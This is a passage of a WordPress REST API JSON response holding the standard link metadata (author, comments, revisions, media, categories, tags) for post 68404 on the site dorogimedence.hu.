href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/comments?post=68404"}],"version-history":[{"count":0,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts\/68404\/revisions"}],"wp:attachment":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/media?parent=68404"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/categories?post=68404"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/tags?post=68404"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}